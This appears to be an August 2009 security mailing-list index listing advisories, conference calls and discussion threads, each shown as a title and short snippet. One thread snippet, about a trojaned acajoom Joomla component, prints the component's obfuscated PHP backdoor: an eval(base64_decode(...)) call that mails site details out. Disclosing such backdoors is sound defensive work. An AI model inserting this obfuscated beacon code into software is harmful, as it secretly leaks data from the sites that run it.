[USN-816-1] fetchmail vulnerability

=== Ubuntu Security Notice USN-816-1August 12, 2009 fetchmail vulnerability CVE-2009-2666 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu

Elkapax CMS Cross site scripting vulnerability

= IUT-CERT = Title: Elkapax CMS Multiple Vulnerabilities Vendor: www.elkapax.com Type: Input.Validation.Vulnerability (Cross Site Scripting) Fix: N/A == nsec.ir = Description: -- Elkapax is a

Authentication Bypass of Snom Phone Web Interface

# # # COMPASS SECURITY ADVISORY # http://www.csnc.ch/en/downloads/advisories.html # # # # Product: Snom VoIP/SIP Phones (Snom300, Snom320, Snom360, #Snom370,

Windows 7 Firewire Attacks - and Defense Techniques

Hello, In the course of the Windows 7 RTM release, the Security Research Lab would like to share some results on firewire/DMA based hacks and Windows 7, which is susceptible to such attacks. While the attack vector itself is already known from previous Windows versions, we also describe the

[security bulletin] HPSBMA02447 SSRT090062 rev.1 - Insight Control Suite For Linux (ICE-LX) Cross Site Request Forgery (CSRF) , Remote Execution of Arbitrary Code, Denial of Service (DoS), and Other V

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01820968 Version: 1 HPSBMA02447 SSRT090062 rev.1 - Insight Control Suite For Linux (ICE-LX) Cross Site Request Forgery (CSRF) , Remote Execution of Arbitrary Code, Denial of Service (DoS),

Static analysis tool exposition (SATE) 2009 - call for participation

We are preparing an exposition for static analysis tools that find security relevant defects. Briefly, participating tool makers run their tools on real programs. Researchers led by NIST analyze the tool reports. Everyone reports results and experiences at a workshop. The tool reports and

Chris Paget Defcon RFID Presentation Slides Now Online

Greetings. The slides for Chris Paget's DEFCON 17 RFID Presentation are now online and available at: http://www.h4rdw4re.com/public/H4RDW4RE_RFID_Defcon17.zip As the many who attended the session know, the presentation was cut short due to time restrictions (the Adam Savage talk behind us

Fwd: Follow-up: Heartland CEO on Data Breach: QSAs Let Us Down

From the folks at Attrition and the DatalossDB. -- Forwarded message -- From: security curmudgeon jeri...@attrition.org Date: Aug 12, 2009 4:22 PM Subject: Follow-up: Heartland CEO on Data Breach: QSAs Let Us Down To: dataloss-disc...@datalossdb.org, datal...@datalossdb.org

Re: Re: Re: Back door trojan in acajoom-3.2.6 for joomla

not are stupids, there are one virus. function GetBots($us1,$us2,$us3) { list($data1,$data2,$data3) = array('dHA6Ly8iLiR1czIuJF9TRVJWRVJbJ', 'QG1haWwoJHVzMSwgJHVzMiwgImh0','1NDUklQVF9OQU1FJ10uIlxuIi4kdXMzKTs'); eval(base64_decode($data2.$data1.$data3)); }

KIWICON ]|[ - 2009 Call For Papers

A wise deadite captain once yelled Cry Havoc and let loose the Dogs of War!. Quite frankly, we couldn't have said it better ourselves: ~~ ~~ || || @ @@@ @@@\___ @@ \ @ X___/

Linux NULL pointer dereference due to incorrect proto_ops initializations

Linux NULL pointer dereference due to incorrect proto_ops initializations - In the Linux kernel, each socket has an associated struct of operations called proto_ops which contain pointers to functions implementing various

[IMF 2009] Call for Participation

Dear all, please find enclosed the call for participation for IMF 2009. See the program at: http://www.imf-conference.org/imf2009/program.html The conference will be held from Tuesday (Sept. 15th) through Wednesday (Sept. 16th). On Thursday (Sept. 17th) selected topics will be addressed in

[SECURITY] [DSA 1861-1] New libxml packages fix several issues

-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1861-1secur...@debian.org http://www.debian.org/security/ Nico Golde August 13th, 2009